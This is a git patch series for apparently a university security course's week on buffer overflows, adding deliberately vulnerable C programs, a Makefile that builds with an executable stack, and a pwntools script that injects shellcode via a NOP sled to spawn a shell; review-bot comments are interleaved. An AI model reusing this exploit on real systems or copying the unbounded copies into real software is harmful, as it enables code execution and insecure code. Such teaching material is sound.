From 7d143c6c84a4234efcf9368e0c7116981c274bfe Mon Sep 17 00:00:00 2001
From: Dan Goldsmith
Date: Mon, 22 Mar 2021 12:12:31 +0000
Subject: [PATCH 1/2] Initial Overflow stuff added
---
Week9_Overflows/Classic_Overflows/classic.c | 24 ++++++++
.../Classic_Overflows/genPayload.py | 61 +++++++++++++++++++
Week9_Overflows/Intro/firstOverflow.c | 43 +++++++++++++
Week9_Overflows/Intro/stackFrames.c | 11 ++++
Week9_Overflows/Intro/strOverflow.c | 9 +++
5 files changed, 148 insertions(+)
create mode 100644 Week9_Overflows/Classic_Overflows/classic.c
create mode 100644 Week9_Overflows/Classic_Overflows/genPayload.py
create mode 100644 Week9_Overflows/Intro/firstOverflow.c
create mode 100644 Week9_Overflows/Intro/stackFrames.c
create mode 100644 Week9_Overflows/Intro/strOverflow.c
diff --git a/Week9_Overflows/Classic_Overflows/classic.c b/Week9_Overflows/Classic_Overflows/classic.c
new file mode 100644
index 0000000..7653ce9
--- /dev/null
+++ b/Week9_Overflows/Classic_Overflows/classic.c
@@ -0,0 +1,24 @@
+#include
+#include
+#include
+
+int BUFFER=200;
+
+int copy(char* input){
+ char buffer[BUFFER];
+ strcpy(buffer, input);
+
+}
+
+int main(int argc, char* argv[]){
+ /* Main Function*/
+ char buf[400];
+ printf("Smash The Stack\n");
+ //Get the data
+ int r;
+ r = read(0, buf, 400); //Save Version
+
+ int out = copy(buf);
+ printf("Lose :(\n");
+ return 0;
+}
diff --git a/Week9_Overflows/Classic_Overflows/genPayload.py b/Week9_Overflows/Classic_Overflows/genPayload.py
new file mode 100644
index 0000000..be87943
--- /dev/null
+++ b/Week9_Overflows/Classic_Overflows/genPayload.py
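Review bot: `copy` is declared `int` but contains no `return`, so `int out = copy(buf);` in `main` reads an indeterminate value (undefined behaviour, and `out` is never used); declare it `void copy(char* input){` and call it as `copy(buf);`. The `read` result `r` is likewise stored and never checked, and `buf` is never NUL-terminated after the read, so a short or failed read still hands an unterminated array to `strcpy`; checking `r` and terminating the buffer keeps the exercise's intended overflow in `copy` while making the input path well-defined. The three `#include` directives carry no header name as rendered here (the same is true in firstOverflow.c and strOverflow.c); if that is not an artefact of this page the files will not compile.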
@@ -0,0 +1,61 @@
+from pwn import *
+
+#Update the Context with the Architecture and OS
+context.update(arch="i386", os="linux")
+
+#Create a Process Object to talk to. This should be our Target Binary
+p = process("./classic")
+
+# Do an initial read to get the welcome message
+data = p.read()
+print(data) #For Debugging
+
+raw_input("Attach GDB and press enter") #More debugging
+
+
+# And add our Shellcode
+
+#shellcode ="".join(["\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46",
+# "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68",
+# "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"])
+
+#shellcode = "".join(["\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70",
+# "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61",
+# "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52",
+# "\x51\x53\x89\xe1\xcd\x80"])
+shellcode = asm(shellcraft.sh())
+print(shellcraft.sh())
+
+
+# Offset to EIP (You need to calculate this)
+OFFSET = 236
+
+#Address we want to jump to (You need to supply this)
+#Pwntools will automatically convert to the correct endianness
+#TARGET_ADDRESS = p32(0xffffd080)
+TARGET_ADDRESS = p32(0x0804901d)
+#TARGET_ADDRESS = "BBBB"
+
+
+#Now we will build our payload
+
+PADD = 150
+payloadLen = OFFSET - len(shellcode) #How many 'A's to Pad with
+payloadLen = payloadLen - PADD #I like a bit of space below the shellcode too
+
+payload = "\x90"*payloadLen
+payload += shellcode #Add Shellcode
+payload += "\x90"*PADD#30 #More Nops
+payload += TARGET_ADDRESS #Address to Jump to
+
+print("PAYLOAD {0} \n{1}".format(payload, len(payload)))
+p.writeline(payload) #Write it to the Binary
+p.interactive() #Go into interactive mode.
+
+#34 is OK, > 34 Crashses
+
+
+
+#Compile With
+#gcc -m32 -fno-stack-protector -z execstack -no-pie classic.c -o classic
+
diff --git a/Week9_Overflows/Intro/firstOverflow.c b/Week9_Overflows/Intro/firstOverflow.c
new file mode 100644
index 0000000..7b49c59
--- /dev/null
+++ b/Week9_Overflows/Intro/firstOverflow.c
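Review bot: The script mixes Python 2 and Python 3 conventions: `raw_input(...)` exists only in Python 2, `print(...)` is written as a function, and under Python 3 `asm(...)` returns `bytes` while `"\x90"*payloadLen` is a `str`, so `payload += shellcode` would raise `TypeError` there. State the intended interpreter in a header comment, e.g. `# Requires Python 2 with pwntools; not Python 3 compatible as written`, rather than leaving it to the reader to discover at runtime. The trailing `#34 is OK, > 34 Crashses` and the `#30` fused onto `payload += "\x90"*PADD#30` read as leftover scratch notes ("Crashses" is also a typo); either explain what the 34 refers to or drop them. The two commented-out shellcode strings duplicate what `shellcraft.sh()` now generates and could be removed for clarity.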
@@ -0,0 +1,43 @@
+#include
+#include
+#include
+#include
+
+int BUFFER=150;
+
+void win(void){
+ /*Win Condition
+ We Want to jump here
+ */
+ printf("\n ===== Win ===== \n\n");
+ system("/bin/sh"); //Tradition to get a shell
+}
+
+void lose(void){
+ /* Lose Condition */
+ printf("Current Memory Address is %p\n",lose);
+ printf("Aim for %p\n", win);
+ printf("Lose :(\n");
+}
+
+int main(int argc, char* argv[]){
+ /* Main Function*/
+
+ //Pointer to the lose function
+ void (*fp)(void) = lose;
+
+ char buffer[BUFFER];
+ printf("Overflow the Buffer\n");
+
+ if (argc != 2){
+ printf("Overflow the buffer\n");
+ printf("Hint! Try `python -c \"print 'A'*100\"`\n");
+ return -1;
+ }
+
+ memcpy(buffer, argv[1], strlen(argv[1]));
+ printf("Off to %p\n",fp);
+ fp();
+
+ return 0;
+}
diff --git a/Week9_Overflows/Intro/stackFrames.c b/Week9_Overflows/Intro/stackFrames.c
new file mode 100644
index 0000000..2dfb5cf
--- /dev/null
+++ b/Week9_Overflows/Intro/stackFrames.c
@@ -0,0 +1,11 @@
+int add(int var1, int var2){
+ //Add two numbers
+ int total;
+ total = var1+var2;
+ return total;
+}
+
+void main(int argv, char* argc){
+ //Function call
+ int total = add(10, 20);
+}
diff --git a/Week9_Overflows/Intro/strOverflow.c b/Week9_Overflows/Intro/strOverflow.c
new file mode 100644
index 0000000..7babffa
--- /dev/null
+++ b/Week9_Overflows/Intro/strOverflow.c
@@ -0,0 +1,9 @@
+#include
+#include
+
+void main(void){
+ char theString[15];
+ //Copy a String that is longer than the space allocated
+ strcpy(theString, "Hello World, This Is A Long String");
+ printf("%s", theString);
+}
From d17b87dbb077cd7ba905ff3b2411d21f7668c62e Mon Sep 17 00:00:00 2001
From: Dan Goldsmith
Date: Mon, 22 Mar 2021 12:18:10 +0000
Subject: [PATCH 2/2] First Overflow makefile added
---
Week9_Overflows/Intro/Makefile | 13 +++++++++++++
1 file changed, 13 insertions(+)
create mode 100644 Week9_Overflows/Intro/Makefile
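Review bot: `BUFFER` is a mutable global `int`, so `char buffer[BUFFER];` in `main` is a variable-length array rather than the fixed 150-byte array the comments and the hint string treat it as; `#define BUFFER 150` (or `static const int BUFFER = 150;`) makes the size a real compile-time constant, and the same applies to classic.c. The unbounded `memcpy(buffer, argv[1], strlen(argv[1]));` is evidently the deliberate defect of this exercise, but nothing in the file says so; a header comment such as `/* Teaching target: the memcpy below is intentionally unbounded. Do not "fix" it or change the build flags without updating the Week 9 notes. */` would keep a later maintainer from silently removing the lesson. The hint `python -c "print 'A'*100"` is Python 2 syntax, which is worth stating next to it since the same mix appears in genPayload.py.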
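Review bot: `void main(int argv, char* argc){` in stackFrames.c has the parameter names swapped against their types and the wrong return type; the hosted signature is `int main(int argc, char* argv[]){` with a `return 0;` at the end, and as written `argv` is an `int` and `argc` a `char*`, which will confuse anyone reading a file whose purpose is to illustrate stack frames. strOverflow.c has the same `void main(void)` return-type problem and should read `int main(void){`. In stackFrames.c `main`'s `total` is assigned and never read, so with optimisation enabled the compiler may drop the `add` call and the frame the file is meant to demonstrate; printing or otherwise using `total` keeps the call observable.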
diff --git a/Week9_Overflows/Intro/Makefile b/Week9_Overflows/Intro/Makefile
new file mode 100644
index 0000000..f86f689
--- /dev/null
+++ b/Week9_Overflows/Intro/Makefile
@@ -0,0 +1,13 @@
+# Build the first overflow target
+
+CC = gcc
+CFLAGS = -m32 -g -z execstack
+
+
+firstOverflow: firstOverflow.c
+
+ $(CC) $(CFLAGS) firstOverflow.c -o firstOverflow
+
+
+all: firstOverflow
+
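Review bot: `CFLAGS = -m32 -g -z execstack` does not match the build command documented at the bottom of genPayload.py (`gcc -m32 -fno-stack-protector -z execstack -no-pie`), and firstOverflow.c never executes code on the stack, so it is unclear which hardening options this target is meant to be built with; a comment naming each flag and why the exercise needs it, e.g. `# -z execstack: deliberately marks the stack executable for the Week 9 exercises`, would make the intent explicit and stop the two files drifting apart. The recipe line `$(CC) $(CFLAGS) firstOverflow.c -o firstOverflow` must be indented with a literal tab, which this rendering cannot confirm. `all` is listed after `firstOverflow`, so a bare `make` builds the first rule regardless; putting `all: firstOverflow` first and adding `.PHONY: all` is the conventional form.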